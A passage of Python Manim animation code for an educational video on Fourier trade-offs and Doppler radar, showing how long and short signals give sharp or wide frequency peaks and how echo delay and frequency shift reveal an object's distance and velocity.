Rotate(
VGroup(line, com_dot),
angle, about_point = ORIGIN
),
Transform(arc, alt_arc),
theta.move_to, 1.5*alt_arc.point_from_proportion(0.5),
rate_func = there_and_back,
run_time = 4
)
self.wait()
class AskAboutLongVsShort(TeacherStudentsScene):
def construct(self):
self.student_says(
"What happens if we \\\\ change the length of \\\\ the signal?",
student_index = 2,
)
self.play(
self.teacher.change, "happy",
self.get_student_changes("pondering", "confused", "raise_right_hand")
)
self.wait(5)
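# Contrast scene: a long-lasting signal winds into a sharp Fourier peak,
# while a very short burst of the same frequency smears into a wide one.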
class LongAndShortSignalsInWindingMachine(FourierRecapScene):
CONFIG = {
"num_fourier_graph_points" : 1000,
}
def construct(self):
self.setup_axes()
self.extend_for_long_time()
self.note_sharp_fourier_peak()
self.very_short_signal()
self.note_wide_fourier_peak()
def setup_axes(self):
FourierRecapScene.setup_axes(self)
self.add(self.circle_plane)
self.add(self.frequency_axes)
self.time_graph = self.graph = self.get_time_graph(width = 2)
self.add(self.time_graph)
self.force_skipping()
self.wrap_signal_around_circle()
fourier_graph = self.get_fourier_transform_graph(self.time_graph)
self.fourier_graph = fourier_graph
self.add(fourier_graph)
self.change_frequency(5)
self.revert_to_original_skipping_status()
def extend_for_long_time(self):
short_time_graph = self.time_graph
long_time_graph = self.get_time_graph(
width = 10,
num_graph_points = 500,
)
long_time_graph.set_stroke(width = 2)
new_freq = 5.1
long_pol_graph = self.get_polarized_mobject(
long_time_graph,
freq = new_freq
)
fourier_graph = self.fourier_graph
self.change_frequency(new_freq)
self.play(
FadeOut(self.graph),
FadeOut(self.graph.polarized_mobject),
FadeOut(fourier_graph)
)
self.play(
ShowCreation(long_time_graph, rate_func=linear),
ShowCreation(long_pol_graph, rate_func=linear),
run_time = 5
)
self.wait()
self.time_graph = self.graph = long_time_graph
def note_sharp_fourier_peak(self):
fourier_graph = self.get_fourier_transform_graph(
self.time_graph,
num_graph_points = self.num_fourier_graph_points
)
self.fourier_graph = fourier_graph
self.note_fourier_peak(fourier_graph, 5, 5.1)
def very_short_signal(self):
time_graph = self.time_graph
fourier_graph = self.fourier_graph
short_time_graph = self.get_time_graph(width = 0.6)
new_freq = 5.1
short_pol_graph = self.get_polarized_mobject(
short_time_graph,
freq = new_freq
)
self.play(
FadeOut(fourier_graph),
FadeOut(time_graph),
FadeOut(time_graph.polarized_mobject),
)
self.play(
ShowCreation(short_time_graph),
ShowCreation(short_time_graph.polarized_mobject),
)
self.graph = self.time_graph = short_time_graph
self.change_frequency(6.66, run_time = 5)
def note_wide_fourier_peak(self):
fourier_graph = self.get_fourier_transform_graph(
self.graph,
num_graph_points = self.num_fourier_graph_points
)
self.fourier_graph = fourier_graph
self.note_fourier_peak(fourier_graph, 5, 6.66)
###
def note_fourier_peak(self, fourier_graph, freq1, freq2):
fourier_graph = self.fourier_graph
dots = self.get_fourier_graph_dots(fourier_graph, freq1, freq2)
self.get_center_of_mass_dot()
self.generate_center_of_mass_dot_update_anim()
self.generate_fourier_dot_transform(fourier_graph)
dot = self.fourier_graph_dot
arrow = Arrow(UP, ORIGIN, buff = SMALL_BUFF)
arrow.next_to(dot, UP, buff = SMALL_BUFF)
self.play(ShowCreation(fourier_graph))
self.change_frequency(freq1,
added_anims = [
MaintainPositionRelativeTo(arrow, dot),
UpdateFromAlphaFunc(
arrow,
lambda m, a : m.set_fill(opacity = a)
),
],
run_time = 3,
)
self.wait()
self.change_frequency(freq2,
added_anims = [
MaintainPositionRelativeTo(arrow, dot)
],
run_time = 3
)
self.wait()
self.play(*list(map(FadeOut, [
dot, arrow, self.center_of_mass_dot
])))
#This is not great...
for attr in "center_of_mass_dot", "fourier_graph_dot":
self.__dict__.pop(attr)
def get_fourier_graph_dots(self, fourier_graph, *freqs):
axis_point = self.frequency_axes.coords_to_point(4.5, -0.25)
dots = VGroup()
for freq in freqs:
point = self.frequency_axes.input_to_graph_point(freq, fourier_graph)
dot = Dot(point)
dot.scale(0.5)
dots.add(dot)
vect = point - axis_point
vect *= 1.3/get_norm(vect)
arrow = Arrow(vect, ORIGIN, buff = SMALL_BUFF)
arrow.set_color(YELLOW)
arrow.shift(point)
dot.arrow = arrow
return dots
class FocusRectangleInsert(FourierRecapScene):
CONFIG = {
"target_width" : 0.5
}
def construct(self):
self.setup_axes()
self.clear()
point = self.frequency_axes.coords_to_point(5, 0.25)
rect = ScreenRectangle(height = 2.1*FRAME_Y_RADIUS)
rect.set_stroke(YELLOW, 2)
self.add(rect)
self.wait()
self.play(
rect.stretch_to_fit_width, self.target_width,
rect.stretch_to_fit_height, 1.5,
rect.move_to, point,
run_time = 2
)
self.wait(3)
class BroadPeakFocusRectangleInsert(FocusRectangleInsert):
CONFIG = {
"target_width" : 1.5,
}
class CleanerFourierTradeoff(FourierTradeoff):
CONFIG = {
"show_text" : False,
"complex_to_real_func" : lambda z : z.real,
"widths" : [0.02, 6, 1],
}
class MentionDopplerRadar(TeacherStudentsScene):
def construct(self):
words = TextMobject("Doppler Radar")
words.next_to(self.teacher, UP)
words.save_state()
words.shift(DOWN).fade(1)
dish = RadarDish()
dish.next_to(self.students, UP, buff = 2, aligned_edge = LEFT)
plane = Plane()
plane.to_edge(RIGHT)
plane.align_to(dish)
always_shift(plane, LEFT, 1)
plane.flip()
pulse = RadarPulse(dish, plane)
look_at_anims = [
Mobject.add_updater(
pi, lambda pi : pi.look_at(pulse.mobject)
)
for pi in self.get_pi_creatures()
]
self.add(dish, plane, pulse, *look_at_anims)
self.play(
self.teacher.change, "hooray",
words.restore
)
self.change_student_modes("pondering", "erm", "sassy")
self.wait(2)
self.play(
self.teacher.change, "happy",
self.get_student_changes(*["thinking"]*3)
)
self.wait()
dish.set_stroke(width = 0)
self.play(UpdateFromAlphaFunc(
VGroup(plane, dish),
lambda m, a : m.set_fill(opacity = 1 - a)
))
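# Doppler radar in two steps: the echo's time delay gives distance
# (2 x distance / signal speed), and the echo's upward frequency shift gives
# velocity, made visible by the Fourier transform plotted underneath.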
class IntroduceDopplerRadar(Scene):
CONFIG = {
"frequency_spread_factor" : 100,
}
def construct(self):
self.setup_axes()
self.measure_distance_with_time()
self.show_frequency_shift()
self.show_frequency_shift_in_fourier()
def setup_axes(self):
self.dish = RadarDish()
self.dish.to_corner(UP+LEFT)
axes = Axes(
x_min = 0,
x_max = 10,
y_min = -1.5,
y_max = 1.5
)
axes.move_to(DOWN)
time_label = TextMobject("Time")
time_label.next_to(axes.x_axis.get_right(), UP)
axes.time_label = time_label
axes.add(time_label)
self.axes = axes
self.add(self.dish)
self.add(axes)
def measure_distance_with_time(self):
dish = self.dish
axes = self.axes
distance = 5
time_diff = 5
speed = (2*distance)/time_diff
randy = Randolph().flip()
randy.match_height(dish)
randy.move_to(dish.get_right(), LEFT)
randy.shift(distance*RIGHT)
pulse_graph, echo_graph, sum_graph = \
self.get_pulse_and_echo_graphs(
self.get_single_pulse_graph,
(1,), (1+time_diff,)
)
words = ["Original signal", "Echo"]
for graph, word in zip([pulse_graph, echo_graph], words):
arrow = Vector(DOWN)
arrow.next_to(graph.peak_point, UP, SMALL_BUFF)
arrow.match_color(graph)
graph.arrow = arrow
label = TextMobject(word)
label.next_to(arrow.get_start(), UP, SMALL_BUFF)
label.match_color(graph)
graph.label = label
double_arrow = DoubleArrow(
pulse_graph.peak_point,
echo_graph.peak_point,
color = WHITE
)
distance_text = TextMobject("$2 \\times$ distance/(signal speed)")
distance_text.set_width(0.9*double_arrow.get_width())
distance_text.next_to(double_arrow, UP, SMALL_BUFF)
#v_line anim?
pulse = RadarPulseSingleton(
dish, randy,
speed = 0.97*speed, #Just needs slightly better alignment
)
graph_draw = turn_animation_into_updater(
ShowCreation(
sum_graph,
rate_func=linear,
run_time = 0.97*axes.x_max
)
)
randy_look_at = Mobject.add_updater(
randy, lambda pi : pi.look_at(pulse.mobject)
)
axes_anim = ContinualAnimation(axes)
self.add(randy_look_at, axes_anim, graph_draw)
self.wait(0.5)
self.add(pulse)
self.play(
Write(pulse_graph.label),
GrowArrow(pulse_graph.arrow),
run_time = 1,
)
self.play(randy.change, "pondering")
self.wait(time_diff - 2)
self.play(
Write(echo_graph.label),
GrowArrow(echo_graph.arrow),
run_time = 1
)
self.wait()
self.play(
GrowFromCenter(double_arrow),
FadeIn(distance_text)
)
self.wait()
self.remove(graph_draw, pulse, randy_look_at, axes_anim)
self.add(axes)
self.play(LaggedStartMap(FadeOut, VGroup(
sum_graph, randy,
pulse_graph.arrow, pulse_graph.label,
echo_graph.arrow, echo_graph.label,
double_arrow, distance_text
)))
def show_frequency_shift(self):
axes = self.axes
dish = self.dish
plane = Plane()
plane.flip()
plane.move_to(dish)
plane.to_edge(RIGHT)
time_diff = 6
pulse_graph, echo_graph, sum_graph = graphs = \
self.get_pulse_and_echo_graphs(
self.get_frequency_pulse_graph,
(1,25), (1+time_diff,50)
)
for graph in graphs:
graph.set_stroke(width = 3)
signal_graph = self.get_frequency_pulse_graph(1)
pulse_brace = Brace(Line(ORIGIN, RIGHT), UP)
pulse_brace.move_to(axes.coords_to_point(1, 1.2))
echo_brace = pulse_brace.copy()
echo_brace.stretch(0.6, 0)
echo_brace.move_to(axes.coords_to_point(7, 1.2))
pulse_text = pulse_brace.get_text("Original signal")
pulse_text.add_background_rectangle()
echo_text = echo_brace.get_text("Echo")
echo_subtext = TextMobject("(Higher frequency)")
echo_subtext.next_to(echo_text, RIGHT)
echo_subtext.match_color(echo_graph)
graph_draw = turn_animation_into_updater(
ShowCreation(sum_graph, run_time = 8, rate_func=linear)
)
pulse = RadarPulse(dish, plane, n_pulse_singletons = 12)
always_shift(plane, LEFT, 1.5)
self.add(graph_draw, pulse, plane)
self.play(UpdateFromAlphaFunc(
plane, lambda m, a : m.set_fill(opacity = a)
))
self.play(
GrowFromCenter(pulse_brace),
FadeIn(pulse_text),
)
self.wait(3)
self.play(
GrowFromCenter(echo_brace),
GrowFromCenter(echo_text),
)
self.play(UpdateFromAlphaFunc(
plane, lambda m, a : m.set_fill(opacity = 1-a)
))
#Only for when -s is run
graph_draw.update(10)
self.wait(0.1)
self.play(Write(echo_subtext, run_time = 1))
self.wait()
self.remove(graph_draw, pulse, plane)
pulse_graph.set_stroke(width = 0)
echo_graph.set_stroke(width = 0)
self.time_graph_group = VGroup(
axes, pulse_brace, pulse_text,
echo_brace, echo_text, echo_subtext,
pulse_graph, echo_graph, sum_graph,
)
self.set_variables_as_attrs(*self.time_graph_group)
def show_frequency_shift_in_fourier(self):
sum_graph = self.sum_graph
pulse_graph = self.pulse_graph
pulse_label = VGroup(self.pulse_brace, self.pulse_text)
echo_graph = self.echo_graph
echo_label = VGroup(
self.echo_brace, self.echo_text, self.echo_subtext
)
#Setup all fourier graph stuff
f_max = 0.02
frequency_axes = Axes(
x_min = 0, x_max = 20,
x_axis_config = {"unit_size" : 0.5},
y_min = -f_max, y_max = f_max,
y_axis_config = {
"unit_size" : 50,
"tick_frequency" : 0.01,
},
)
frequency_axes.move_to(self.axes, LEFT)
frequency_axes.to_edge(DOWN)
frequency_label = TextMobject("Frequency")
frequency_label.next_to(
frequency_axes.x_axis.get_right(), UP,
)
frequency_label.to_edge(RIGHT)
frequency_axes.add(frequency_label)
for graph in pulse_graph, echo_graph, sum_graph:
graph.fourier_transform = get_fourier_graph(
frequency_axes, graph.underlying_function,
frequency_axes.x_min, 25,
complex_to_real_func = abs,
)
#Braces labeling F.T.
original_fourier_brace = Brace(
Line(
frequency_axes.coords_to_point(7, 0.9*f_max),
frequency_axes.coords_to_point(9, 0.9*f_max),
),
UP,
).set_color(BLUE)
echo_fourier_brace = Brace(
Line(
frequency_axes.coords_to_point(14, 0.4*f_max),
frequency_axes.coords_to_point(18, 0.4*f_max),
),
UP,
).set_color(YELLOW)
# braces = [original_fourier_brace, echo_fourier_brace]
# words = ["original signal", "echo"]
# for brace, word in zip(braces, words):
# brace.add(brace.get_text("F.T. of \\\\ %s"%word))
fourier_label = TexMobject("||\\text{Fourier transform}||")
# fourier_label.next_to(sum_graph.fourier_transform, UP, MED_LARGE_BUFF)
fourier_label.next_to(frequency_axes.y_axis, UP, buff = SMALL_BUFF)
fourier_label.shift_onto_screen()
fourier_label.set_color(RED)
#v_lines
v_line = DashedLine(
frequency_axes.coords_to_point(8, 0),
frequency_axes.coords_to_point(8, 1.2*f_max),
color = YELLOW,
dash_length = 0.025,
)
v_line_pair = VGroup(*[
v_line.copy().shift(u*0.6*RIGHT)
for u in (-1, 1)
])
v_line = VGroup(v_line)
double_arrow = DoubleArrow(
frequency_axes.coords_to_point(8, 0.007),
frequency_axes.coords_to_point(16, 0.007),
buff = 0,
color = WHITE
)
self.play(
self.time_graph_group.to_edge, UP,
ApplyMethod(
self.dish.shift, 2*UP,
remover = True
),
FadeIn(frequency_axes)
)
self.wait()
self.play(
FadeOut(sum_graph),
FadeOut(echo_label),
pulse_graph.set_stroke, {"width" : 3},
)
self.play(
ReplacementTransform(
pulse_label[0].copy(),
original_fourier_brace
),
ShowCreation(pulse_graph.fourier_transform)
)
self.play(Write(fourier_label))
self.wait()
self.play(ShowCreation(v_line))
self.wait()
self.play(ReplacementTransform(v_line, v_line_pair))
self.wait()
self.play(FadeOut(v_line_pair))
self.wait()
self.play(
FadeOut(pulse_graph),
FadeIn(sum_graph),
ReplacementTransform(
pulse_graph.fourier_transform,
sum_graph.fourier_transform
)
)
self.play(FadeIn(echo_label))
self.play(ReplacementTransform(
echo_label[0].copy(),
echo_fourier_brace,
))
self.wait(2)
self.play(GrowFromCenter(double_arrow))
self.wait()
###
def get_graph(self, func, **kwargs):
graph = self.axes.get_graph(func, **kwargs)
graph.peak_point = self.get_peak_point(graph)
return graph
def get_single_pulse_graph(self, x, **kwargs):
return self.get_graph(self.get_single_pulse_function(x), **kwargs)
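# A single sharp ping: a sine burst under a tight Gaussian envelope centered at x.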
def get_single_pulse_function(self, x):
return lambda t : -2*np.sin(10*(t-x))*np.exp(-100*(t-x)**2)
def get_frequency_pulse_graph(self, x, freq = 50, **kwargs):
return self.get_graph(
self.get_frequency_pulse_function(x, freq),
num_graph_points = 700,
**kwargs
)
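# A cosine burst at the given frequency, centered at x. The Gaussian envelope
# narrows as freq grows (width on the order of sqrt(factor)/freq), and the
# min(..., 0.5) caps the envelope's height.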
def get_frequency_pulse_function(self, x, freq):
factor = self.frequency_spread_factor
return lambda t : op.mul(
2*np.cos(2*freq*(t-x)),
min(np.exp(-(freq**2/factor)*(t-x)**2), 0.5)
)
def get_peak_point(self, graph):
anchors = graph.get_anchors()
return anchors[np.argmax([p[1] for p in anchors])]
def get_pulse_and_echo_graphs(self, func, args1, args2):
pulse_graph = func(*args1, color = BLUE)
echo_graph = func(*args2, color = YELLOW)
sum_graph = self.axes.get_graph(
lambda x : sum([
pulse_graph.underlying_function(x),
echo_graph.underlying_function(x),
]),
num_graph_points = echo_graph.get_num_curves(),
color = WHITE
)
sum_graph.background_image_file = "blue_yellow_gradient"
return pulse_graph, echo_graph, sum_graph
class DopplerFormulaInsert(Scene):
def construct(self):
formula = TexMobject(
"f_{\\text{echo}", "=",
"\\left(1 + \\frac{v}{c}\\right)",
"f_{\\text{pulse}}"
)
formula[0].set_color(BLUE)
formula[3].set_color(YELLOW)
randy = Randolph(color = BLUE_C)
formula.scale(1.5)
formula.next_to(randy, UP+LEFT)
formula.shift_onto_screen()
self.add(randy)
self.play(
LaggedStartMap(FadeIn, formula),
randy.change, "pondering", randy.get_bottom(),
)
self.play(Blink(randy))
self.wait(2)
self.play(Blink(randy))
self.wait()
class MentionPRFNuance(TeacherStudentsScene):
def construct(self):
title = TextMobject(
"Speed of light", "$\\gg$", "Speed of a plane"
)
title.to_edge(UP)
self.add(title)
axes = self.axes = Axes(
x_min = 0, x_max = 10,
y_min = 0, y_max = 2,
)
axes.next_to(title, DOWN, buff = MED_LARGE_BUFF)
frequency_label = TextMobject("Frequency")
frequency_label.scale(0.7)
frequency_label.next_to(axes.x_axis.get_right(), UP)
axes.add(frequency_label)
self.add(axes)
pulse_x, shift_x = 4, 6
pulse_graph = self.get_spike_graph(pulse_x)
shift_graph = self.get_spike_graph(shift_x)
shift_graph.set_stroke(YELLOW, 2)
peak_points = VGroup(pulse_graph.peak_point, shift_graph.peak_point)
self.add(pulse_graph)
brace = Brace(peak_points, UP, buff = SMALL_BUFF)
displayed_doppler_shift = TextMobject("How I'm showing the \\\\", "Doppler shift")
actual_doppler_shift = TextMobject("Actual\\\\", "Doppler shift")
doppler_shift_words = VGroup(displayed_doppler_shift, actual_doppler_shift)
doppler_shift_words.set_color(YELLOW)
doppler_shift_words.scale(0.75)
displayed_doppler_shift.next_to(brace, UP, buff = SMALL_BUFF)
actual_doppler_shift.move_to(pulse_graph.peak_point)
actual_doppler_shift.align_to(displayed_doppler_shift)
self.play(
Animation(pulse_graph),
self.teacher.change, "raise_right_hand",
run_time = 1
)
self.play(
ShowCreation(shift_graph),
FadeIn(brace),
Write(displayed_doppler_shift, run_time = 1),
self.get_student_changes(*3*["sassy"]),
)
self.play(
UpdateFromAlphaFunc(
shift_graph,
lambda g, a : Transform(
g, self.get_spike_graph(
interpolate(shift_x, pulse_x+0.01, a),
).match_style(shift_graph)
).update(1),
),
UpdateFromFunc(
brace,
lambda b : b.match_width(
peak_points, stretch = True
).next_to(peak_points, UP, SMALL_BUFF)
),
Transform(
displayed_doppler_shift, actual_doppler_shift,
rate_func = squish_rate_func(smooth, 0.3, 0.6)
),
run_time = 3
)
self.wait(2)
everything = VGroup(
title,
axes, pulse_graph, shift_graph,
brace, displayed_doppler_shift
)
rect = SurroundingRectangle(everything, color = WHITE)
everything.add(rect)
self.teacher_says(
"I'll ignore certain \\\\ nuances for now.",
target_mode = "shruggie",
added_anims = [
everything.scale, 0.4,
everything.to_corner, UP+LEFT,
UpdateFromAlphaFunc(
rect, lambda m, a : m.set_stroke(width = 2*a)
)
],
)
self.change_student_modes(*3*["hesitant"])
self.wait(2)
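# A Gaussian-enveloped cosine spike centered at x; peak_point is stored so
# braces and labels can track the maximum.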
def get_spike_graph(self, x, color = RED, **kwargs):
graph = self.axes.get_graph(
lambda t : np.exp(-10*(t-x)**2)*np.cos(10*(t-x)),
color = color,
**kwargs
)
graph.peak_point = VectorizedPoint(self.axes.input_to_graph_point(x, graph))
graph.add(graph.peak_point)
return graph
class TimeAndFrequencyGivePositionAndVelocity(IntroduceDopplerRadar):
def construct(self):
x = 7
freq = 25
axes = self.axes = Axes(
x_min = 0, x_max = 10,
y_min = -2, y_max = 2,
)
axes.center()
title = TextMobject("Echo signal")
title.next_to(axes.y_axis, UP)
axes.add(title)
axes.to_edge(UP)
graph = self.get_frequency_pulse_graph(x = x, freq = freq)
graph.background_image_file = "blue_yellow_gradient"
arrow = Arrow(
axes.coords_to_point(0, -1.5),
axes.coords_to_point(x, -1.5),
color = WHITE,
buff = SMALL_BUFF,
)
time = TextMobject("Time")
time.next_to(arrow, DOWN, SMALL_BUFF)
delta_x = 0.7
brace = Brace(
Line(
axes.coords_to_point(x-delta_x, 1),
axes.coords_to_point(x+delta_x, 1)
),
UP
)
frequency = TextMobject("Frequency")
frequency.set_color(YELLOW)
frequency.next_to(brace, UP, SMALL_BUFF)
time_updown_arrow = TexMobject("\\Updownarrow")
time_updown_arrow.next_to(time, DOWN, SMALL_BUFF)
freq_updown_arrow = time_updown_arrow.copy()
freq_updown_arrow.next_to(frequency, UP, SMALL_BUFF)
distance = TextMobject("Distance")
distance.next_to(time_updown_arrow, DOWN, SMALL_BUFF)
velocity = TextMobject("Velocity")
velocity.next_to(freq_updown_arrow, UP, SMALL_BUFF)
VGroup(freq_updown_arrow, velocity).match_style(frequency)
self.add(axes)
self.play(ShowCreation(graph))
self.play(
GrowArrow(arrow),
LaggedStartMap(FadeIn, time, run_time = 1)
)
self.play(
GrowFromCenter(brace),
LaggedStartMap(FadeIn, frequency, run_time = 1)
)
self.wait()
self.play(
GrowFromPoint(time_updown_arrow, time_updown_arrow.get_top()),
ReplacementTransform(
time.copy().fade(1),
distance
)
)
self.play(
GrowFromPoint(freq_updown_arrow, freq_updown_arrow.get_top()),
ReplacementTransform(
frequency.copy().fade(1),
velocity
)
)
self.wait()
class RadarOperatorUncertainty(Scene):
def construct(self):
dish = RadarDish()
dish.scale(3)
dish.move_to(4*RIGHT + 2*DOWN)
dish_words = TextMobject("3b1b industrial \\\\ enterprises")
dish_words.scale(0.25)
dish_words.set_stroke(BLACK, 0.5)
dish_words.set_color(BLACK)
dish_words.move_to(dish, DOWN)
dish_words.shift(SMALL_BUFF*(UP+2*LEFT))
dish.add(dish_words)
randy = Randolph()
randy.next_to(dish, LEFT, aligned_edge = DOWN)
bubble = randy.get_bubble(
width = 7,
height = 4,
)
echo_object = Square()
echo_object.move_to(dish)
echo_object.shift(FRAME_X_RADIUS*RIGHT)
pulse = RadarPulse(dish, echo_object, speed = 6)
plane = Plane().scale(0.5)
plane.move_to(bubble.get_bubble_center()+LEFT)
plane_cloud = ProbabalisticMobjectCloud(
plane,
fill_opacity = 0.3,
n_copies = 10,
)
plane_gdw = plane_cloud.gaussian_distribution_wrapper
vector_cloud = ProbabalisticVectorCloud(
center_func = plane_gdw.get_center,
)
vector_gdw = vector_cloud.gaussian_distribution_wrapper
vector_gdw.scale(0.05)
vector_gdw.move_to(plane_gdw)
vector_gdw.shift(2*RIGHT)
self.add(randy, dish, bubble, plane_cloud, pulse)
self.play(randy.change, "confused")
self.wait(3)
self.add(vector_cloud)
for i in range(3):
for plane_factor, vector_factor, freq in (0.05, 10, 0.01), (20, 0.1, 0.1):
pulse.internal_time = 0
pulse.frequency = freq
self.play(
randy.change, "pondering", plane,
plane_gdw.scale, plane_factor,
vector_gdw.scale, vector_factor,
)
self.wait(2)
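# The radar version of the trade-off: long pure pulses from several objects
# overlap hopelessly in time, while short pulses resolve positions but leave
# wide, overlapping Doppler-shifted peaks in frequency space.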
class AmbiguityInLongEchos(IntroduceDopplerRadar, PiCreatureScene):
CONFIG = {
"object_x_coords" : [7, 4, 6, 9, 8],
"frequency_spread_factor" : 200,
"n_pulse_singletons" : 16,
"pulse_frequency" : 0.025,
}
def construct(self):
self.setup_axes()
self.setup_objects()
self.send_long_pulse_single_echo()
self.introduce_multiple_objects()
self.use_short_pulse()
self.fourier_transform_of_one_pulse()
self.show_echos_of_moving_objects()
self.overlapping_frequencies_of_various_objects()
self.echos_of_long_pure_signal_in_frequency_space()
self.concentrated_fourier_requires_long_time()
def setup_axes(self):
axes = self.axes = Axes(
x_min = 0, x_max = 10,
y_min = -1.5, y_max = 1.5,
)
time_label = TextMobject("Time")
time_label.next_to(axes.x_axis.get_right(), UP)
axes.add(time_label)
axes.center()
axes.shift(DOWN)
self.add(axes)
dish = self.dish = RadarDish()
dish.move_to(axes, LEFT)
dish.to_edge(UP, buff = LARGE_BUFF)
self.add(dish)
def setup_objects(self):
objects = self.objects = VGroup(
Plane().flip(),
SVGMobject(
file_name = "blimp",
color = BLUE_C,
height = 0.5,
),
SVGMobject(
file_name = "biplane",
color = RED_D,
height = 0.5,
),
SVGMobject(
file_name = "helicopter",
color = LIGHT_GREY,
height = 0.5,
).rotate(-TAU/24),
FalconHeavy(),
)
y_shifts = [0.25, 0, 0.5, 0.25, -0.5]
for x, y, obj in zip(self.object_x_coords, y_shifts, objects):
obj.move_to(self.axes.coords_to_point(x, 0))
obj.align_to(self.dish)
obj.shift(y*UP)
self.object_velocities = [
0.7*LEFT,
0.1*RIGHT,
0.4*LEFT,
0.4*RIGHT,
0.5*UP,
]
def send_long_pulse_single_echo(self):
x = self.object_x_coords[0]
plane = self.objects[0]
self.add(plane)
randy = self.pi_creature
self.remove(randy)
pulse_graph = self.get_frequency_pulse_graph(x)
pulse_graph.background_image_file = "blue_yellow_gradient"
pulse = self.get_pulse(self.dish, plane)
brace = Brace(
Line(
self.axes.coords_to_point(x-1, 1),
self.axes.coords_to_point(x+1, 1),
), UP
)
words = brace.get_text("Spread over time")
self.add(pulse)
self.wait()
squished_rate_func = squish_rate_func(smooth, 0.6, 0.9)
self.play(
ShowCreation(pulse_graph, rate_func=linear),
GrowFromCenter(brace, rate_func = squished_rate_func),
Write(words, rate_func = squished_rate_func),
run_time = 3,
)
self.remove(pulse)
self.play(FadeIn(randy))
self.play(PiCreatureBubbleIntroduction(
randy, "Who cares?",
bubble_class = ThoughtBubble,
bubble_kwargs = {
"direction" : LEFT,
"width" : 2,
"height": 1.5,
},
target_mode = "maybe",
look_at_arg = brace,
))
self.play(Blink(randy))
self.play(LaggedStartMap(
FadeOut, VGroup(
randy.bubble, randy.bubble.content,
brace, words,
)
))
self.curr_graph = pulse_graph
def introduce_multiple_objects(self):
objects = self.objects
x_coords = self.object_x_coords
curr_graph = self.curr_graph
randy = self.pi_creature
graphs = VGroup(*[
self.get_frequency_pulse_graph(x)
for x in x_coords
])
graphs.set_color_by_gradient(BLUE, YELLOW)
sum_graph = self.axes.get_graph(
lambda t : sum([
graph.underlying_function(t)
for graph in graphs
]),
num_graph_points = 1000
)
noise_function = lambda t : np.sum([
0.5*np.sin(f*t)/f
for f in (2, 3, 5, 7, 11, 13)
])
noisy_graph = self.axes.get_graph(
lambda t : sum_graph.underlying_function(t)*(1+noise_function(t)),
num_graph_points = 1000
)
for graph in sum_graph, noisy_graph:
graph.background_image_file = "blue_yellow_gradient"
pulses = self.get_pulses()
self.play(
LaggedStartMap(GrowFromCenter, objects[1:]),
FadeOut(curr_graph),
randy.change, "pondering"
)
self.add(*pulses)
self.wait(0.5)
self.play(
ShowCreation(
sum_graph,
rate_func=linear,
run_time = 3.5,
),
randy.change, "confused"
)
self.remove(*pulses)
self.play(randy.change, "pondering")
self.play(Transform(
sum_graph, noisy_graph,
rate_func = lambda t : wiggle(t, 4),
run_time = 3
))
self.wait(2)
self.curr_graph = sum_graph
def use_short_pulse(self):
curr_graph = self.curr_graph
objects = self.objects
x_coords = self.object_x_coords
randy = self.pi_creature
self.frequency_spread_factor = 10
self.n_pulse_singletons = 4
self.pulse_frequency = 0.015
graphs = VGroup(*[
self.get_frequency_pulse_graph(x)
for x in x_coords
])
sum_graph = self.axes.get_graph(
lambda t : sum([
graph.underlying_function(t)
for graph in graphs
]),
num_graph_points = 1000
)
sum_graph.background_image_file = "blue_yellow_gradient"
pulses = self.get_pulses()
self.play(FadeOut(curr_graph))
self.add(*pulses)
self.wait(0.5)
self.play(
ShowCreation(
sum_graph,
rate_func=linear,
run_time = 3.5,
),
randy.change, "happy"
)
self.wait()
self.curr_graph = sum_graph
self.first_echo_graph = graphs[0]
self.first_echo_graph.set_color(YELLOW)
def fourier_transform_of_one_pulse(self):
frequency_axes = Axes(
x_min = 0, x_max = 20,
x_axis_config = {
"unit_size" : 0.5,
"tick_frequency" : 2,
},
y_min = -.01, y_max = .01,
y_axis_config = {
"unit_size" : 110,
"tick_frequency" : 0.006
}
)
frequency_label = TextMobject("Frequency")
frequency_label.next_to(frequency_axes.x_axis.get_right(), UP)
frequency_axes.add(frequency_label)
first_echo_graph = self.first_echo_graph
self.play(
ApplyMethod(
VGroup(self.axes, first_echo_graph).to_edge, UP,
{"buff" : SMALL_BUFF},
rate_func = squish_rate_func(smooth, 0.5, 1)
),
LaggedStartMap(FadeOut, self.objects),
LaggedStartMap(FadeOut, VGroup(
self.curr_graph, self.dish, self.pi_creature
)),
run_time = 2
)
#
frequency_axes.next_to(self.axes, DOWN, LARGE_BUFF, LEFT)
fourier_graph = get_fourier_graph(
frequency_axes, first_echo_graph.underlying_function,
t_min = 0, t_max = 25,
complex_to_real_func = np.abs,
)
fourier_graph.save_state()
fourier_graph.move_to(first_echo_graph)
h_vect = 4*RIGHT
fourier_graph.shift(h_vect)
fourier_graph.fade(1)
f = 8
v_line = DashedLine(
frequency_axes.coords_to_point(f, 0),
frequency_axes.coords_to_point(f, frequency_axes.y_max),
)
v_lines = VGroup(
v_line.copy().shift(2*LEFT),
v_line.copy().shift(2*RIGHT),
)
rect = Rectangle(stroke_width = 0, fill_color = YELLOW, fill_opacity = 0.25)
rect.replace(v_lines, stretch = True)
rect.save_state()
rect.stretch(0, 0)
self.play(Write(frequency_axes, run_time = 1))
self.play(
ApplyFunction(
lambda m : m.move_to(fourier_graph.saved_state).shift(-h_vect).fade(1),
first_echo_graph.copy(),
remover = True,
),
fourier_graph.restore
)
self.wait()
self.play(ShowCreation(v_line))
self.play(
ReplacementTransform(VGroup(v_line), v_lines),
rect.restore
)
self.wait()
self.play(FadeOut(v_lines), FadeOut(rect))
self.frequency_axes = frequency_axes
self.fourier_graph = fourier_graph
def show_echos_of_moving_objects(self):
objects = self.objects
objects.save_state()
object_velocities = self.object_velocities
movements = self.object_movements = [
always_shift(
obj,
direction = v/get_norm(v),
rate = get_norm(v)
)
for v, obj in zip(object_velocities, objects)
]
pulses = self.get_pulses()
continual_anims = pulses+movements
self.play(
FadeOut(self.axes),
FadeOut(self.first_echo_graph),
LaggedStartMap(FadeIn, objects),
FadeIn(self.dish)
)
self.add(*continual_anims)
self.wait(4)
self.play(*[
UpdateFromAlphaFunc(
obj,
lambda m, a : m.set_fill(opacity = 1-a),
)
for obj in objects
])
self.remove(*continual_anims)
self.wait()
def overlapping_frequencies_of_various_objects(self):
frequency_axes = self.frequency_axes
fourier_graph = self.fourier_graph
shifted_graphs = self.get_shifted_frequency_graphs(fourier_graph)
color = fourier_graph.get_color()
shifted_graphs.set_color_by_gradient(
average_color(color, WHITE),
color,
average_color(color, BLACK),
)
sum_graph = self.get_sum_graph(frequency_axes, shifted_graphs)
sum_graph.match_style(fourier_graph)
shifted_graphs.save_state()
self.play(ReplacementTransform(
VGroup(fourier_graph), shifted_graphs,
lag_ratio = 0.5,
run_time = 2
))
self.wait()
self.play(
shifted_graphs.arrange, DOWN,
